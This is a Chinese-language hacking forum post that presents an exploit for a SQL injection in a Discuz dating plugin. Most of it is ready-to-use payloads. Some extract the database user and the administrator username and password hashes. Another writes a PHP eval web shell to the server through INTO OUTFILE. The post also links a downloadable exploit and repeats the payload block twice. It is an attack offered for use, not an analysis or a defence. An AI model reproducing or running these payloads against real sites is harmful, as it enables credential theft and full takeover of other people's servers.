最新Discuz交友插件漏洞附EXP
DZ交友插件漏洞jiaoyou.php?pid=1
有的注入需要登录,注入代码如下:
' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1
爆管理账号密码方法一:
' or @`'` and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(username,0x24,password) as char),0x27,0x7e) FROM pre_common_member LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1
爆管理账号密码方法二:
' or @`'` and(select 1 from(select count(*),concat((select (select concat(username,0x24,password,0x24) from pre_common_member where uid=1 limit 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1
root权限写shell:
' or @`'` union select 1,0x3C3F706870206576616C28245F504F53545B635D293F3E,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 into outfile 'D:\\wwwroot\\gzcity2\\t.php'-- where 1 or @`'` and '1'='1
初学php,写了个简单的exp:
下载地址:http://www.i0day.com/1207.html
有的注入需要登录,注入代码如下:
' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1
爆管理账号密码方法一:
' or @`'` and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(username,0x24,password) as char),0x27,0x7e) FROM pre_common_member LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1
爆管理账号密码方法二:
' or @`'` and(select 1 from(select count(*),concat((select (select concat(username,0x24,password,0x24) from pre_common_member where uid=1 limit 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1
root权限写shell:
' or @`'` union select 1,0x3C3F706870206576616C28245F504F53545B635D293F3E,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 into outfile 'D:\\wwwroot\\gzcity2\\t.php'-- where 1 or @`'` and '1'='1
初学php,写了个简单的exp:
下载地址:http://www.i0day.com/1207.html
关于作者
评论21次
这个是插件漏洞吧```没有装这个插件的都用不了了``唉``